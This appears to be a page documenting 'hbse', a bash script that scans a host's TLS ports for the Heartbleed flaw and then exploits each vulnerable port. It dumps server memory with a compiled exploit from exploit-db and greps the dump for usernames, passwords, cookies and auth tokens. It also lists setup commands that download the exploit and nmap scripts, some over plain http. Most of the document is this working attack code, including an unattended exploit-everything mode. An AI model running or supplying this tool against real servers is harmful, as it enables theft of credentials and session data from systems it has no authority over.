# Heartbleed


Affected OpenSSL versions

The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive); the 1.0.2-beta1 pre-release was affected as well.
Later versions (1.0.1g and later, 1.0.2-beta2 and later) and previous branches (1.0.0 and older) are not vulnerable.
Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS. Note that distributions often backport the fix without changing the upstream version string (a patched 1.0.1e still reports itself as 1.0.1e), so do not rely on the version number alone — test the service, as the script below does.

Scan and exploit

# ./hbse 127.0.0.1 # Interactive mode: scan, then ask before exploiting.
# ./hbse --scan 127.0.0.1 # Non-interactive mode: scan only.
# ./hbse --exploit 127.0.0.1 # Non-interactive mode: scan and exploit every vulnerable port.

# cat hbse 
#!/bin/bash

### TCP ####

# 443  (HTTPS - HTTP over SSL)
# 465  (SMTPS - SMTP over SSL)
# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 989  (FTPS Data - FTP Data over TLS/SSL)
# 990  (FTPS Control - FTP Control over TLS/SSL)
# 992  (Telnet over TLS/SSL)
# 993  (IMAPS - IMAP over SSL)
# 995  (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)

### UDP ###

# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)

if [ $# -eq 1 ]; then
    ip="$1"
elif [ $# -eq 2 ]; then
    se="$1"
    ip="$2"
else
    exit
fi
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"

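# print TEXT COLOR
# Write TEXT to stdout wrapped in the ANSI colour named by COLOR (gray, red,
# green, yellow). No trailing newline is added; callers embed "\n" in TEXT.
# Backslash escapes in TEXT are interpreted (printf %b), which is what the
# previous `echo -e` did. Unlike the previous unquoted `echo $header$text`,
# TEXT is never word-split or glob-expanded: callers pass data pulled from the
# remote process's memory (the `strings` output), and a '*' in it would have
# expanded to local filenames. An unknown COLOR gives no colour prefix
# (previously the prefix from the last call leaked, since it was a global).
print() {
    local text="$1"
    local color="$2"
    local header=""
    case "$color" in
        gray)   header="\e[38;5;250m" ;;
        red)    header="\e[91m" ;;
        green)  header="\e[92m" ;;
        yellow) header="\e[93m" ;;
    esac
    local tail="\e[0m"
    printf '%b%b%b' "$header" "$text" "$tail"
}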

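# Main flow: quick ssl-heartbleed check on 443, then a wider scan over
# $nports, then (unless --scan) dump memory from every vulnerable port with
# ./heartbleed and grep the dump for credential-looking strings.
print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="$(nmap -p T:443 --script ssl-heartbleed "$ip" | grep VULNERABLE)"

if [ -n "$vulnerable" ]; then
    print "Yes\n" "green"
    print "Checking if it is vulnerable on other ports... " "gray"
    # Take the "<port>/<proto> open ..." line that precedes each
    # "VULNERABLE:" marker and keep only the port number. This depends on
    # the ssl-heartbleed NSE output layout (two lines between the port line
    # and the marker).
    vports="$(nmap -p "$nports" --script ssl-heartbleed "$ip" | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}')"
    # Count vulnerable ports. 443 is in $nports, so one line means no *other*
    # port is affected. Previously the undefined $ports was counted, which
    # always gave 1 and so always reported "No". An empty list (second scan
    # failed or differed) is treated as "no others" as well.
    n="$(printf '%s\n' "$vports" | grep -c .)"
    if [ "$n" -le 1 ]; then
        print "No\n" "red"
        w1="port"; w2="it"; w3="file"
    else
        print "Yes\n" "green"
        w1="ports"; w2="them"; w3="files"
    fi
    print "Vulnerable $w1:\n" "gray"
    print "$vports\n" "green"
    if [ "$se" == "--scan" ]; then
        exit
    elif [ "$se" == "--exploit" ]; then
        answer="Y"
    else
        print "Do you want to exploit $w2? [Yn] " "gray"
        read -r answer
    fi
    if [ "$answer" = "Y" ]; then
        print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
        # The port list is fed on fd 3 (scoped to this loop) so the
        # interactive `read answer` prompts below still use stdin.
        while read -r port <&3; do
            [ -n "$port" ] || continue
            print "+ Port [$port]\n" "gray"
            ofile="$ip.$port"
            rm -f -- "$ofile"
            # Per-port mode flag for ./heartbleed (-c). The values are kept
            # from the original script; what each mode means is defined in
            # heartbleed.c, which is not shown here. An array is used so an
            # empty value adds no argument and values are never re-split.
            precmd=()
            case "$port" in
                465) precmd=(-c 0) ;;
                993) precmd=(-c 2) ;;
                995) precmd=(-c 1) ;;
            esac
            ./heartbleed -s "$ip" -p "$port" -f "$ofile" "${precmd[@]}" -t 1 > /dev/null 2>&1
            if [ -f "$ofile" ]; then
                # Pick strings that look like credentials or session data out
                # of the dump; the content is attacker-controlled remote memory
                # and is only ever printed through print (quoted), never eval'd.
                r="$(strings "$ofile" | grep -i -e user -e pass -e login -e auth -e cookie -e basic)"
                print "$r\n" "green"
                if [ "$se" != "--exploit" ]; then
                    print "Do you want to less the hexdump file? [Yn] " "gray"
                    read -r answer
                    if [ "$answer" = "Y" ]; then
                        hexdump -C "$ofile" | less
                    fi
                fi
            else
                print "Error: heartbleed did not work on port $port...\n" "yellow"
            fi
        done 3<<< "$vports"
        if [ "$se" != "--exploit" ]; then
            print "Do you want to delete the hexdump $w3? [Yn] " "gray"
            read -r answer
            if [ "$answer" = "Y" ]; then
                # Remove only the files this run created. The previous
                # `rm -f $ip.*` deleted everything in the cwd with that
                # prefix, which is dangerous when $ip is a hostname.
                while read -r port; do
                    [ -n "$port" ] || continue
                    rm -f -- "$ip.$port"
                done <<< "$vports"
            fi
        fi
    fi
else
    print "No\n" "red"
fi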

Requirements

# apt-get install nmap
Note: the downloads below either disable certificate checking (--no-check-certificate) or use plain http://, and the fetched NSE script and C exploit are then installed and compiled locally. Prefer https:// with certificate verification and read the fetched code before installing it.
# wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
# mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
# wget http://nmap.org/svn/nselib/tls.lua
# mv tls.lua /usr/share/nmap/nselib/.
# wget -O heartbleed.c http://www.exploit-db.com/download/32791
# gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
